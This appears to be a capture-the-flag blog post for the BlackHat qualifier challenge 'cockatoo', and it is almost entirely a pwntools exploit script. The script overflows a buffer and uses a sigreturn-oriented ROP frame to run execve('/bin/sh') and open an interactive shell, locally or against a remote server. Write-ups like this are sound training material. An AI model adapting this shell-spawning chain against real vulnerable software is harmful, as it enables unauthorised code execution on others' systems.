Home BlackHat Qualifier cockatoo
Post
Cancel

BlackHat Qualifier cockatoo

Purpose : Get The Flag

img_1

img_2

img_3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/python3

from pwn import *
import struct
from ctypes import *
import subprocess
  
context.terminal = ['tmux','splitw']

os.environ['XDG_CACHE_HOME'] = '/tmp/'

context.log_level = 'ERROR'

# Allows you to switch between local/GDB/remote from terminal

def start(argv=[], *a, **kw):

    if args.GDB: # Set GDBscript below

        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)

    elif args.REMOTE: # ('server', 'port')

        return remote(sys.argv[1], sys.argv[2], *a, **kw)

    else: # Run locally

        return process([exe] + argv, *a, **kw)

  
  

# Specify GDB script here (breakpoints etc)

gdbscript = '''

break *main+209


continue
'''.format(**locals())

#exe = '/challenge/babyrop_level10.1'; elf = context.binary = ELF(exe)
exe = './bin'; elf = context.binary = ELF(exe)
libc = elf.libc 
c = constants

exe_rop = ROP(elf,checksec=False)

io = start()

payload = b""
payload += b"\x50"*0x100+b"\x17"
payload += p64(exe_rop.find_gadget([ 'pop rax','ret' ])[0])
payload += p64(15) #SYS_Sigreturn
payload += p64(exe_rop.find_gadget([ 'syscall' ])[0])

frame = SigreturnFrame()

frame.rax = constants.SYS_execve 
frame.rdi = 0x45
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0x404900
frame.rip = elf.sym.main #exe_rop.find_gadget([ 'syscall' ])[0]

payload += bytes(frame)

io.sendline(payload)


sleep(1)

payload = b"\x00\x00/bin/sh\x00"
payload += b"\x50"*(0x100-len(payload))
payload += b"\x17"
payload += p64(exe_rop.find_gadget([ 'pop rax','ret' ])[0])
payload += p64(15) #SYS_Sigreturn
payload += p64(exe_rop.find_gadget([ 'syscall' ])[0])
frame = SigreturnFrame()

frame.rax = constants.SYS_execve 
frame.rdi = 0x4047ea
frame.rsi = 0
frame.rdx = 0
frame.rsp = 0x403050
frame.rip = exe_rop.find_gadget([ 'syscall' ])[0]

payload += bytes(frame)


io.sendline(payload)
print(f"payload 2 :: {payload}")


io.interactive()

This post is licensed under CC BY 4.0 by the author.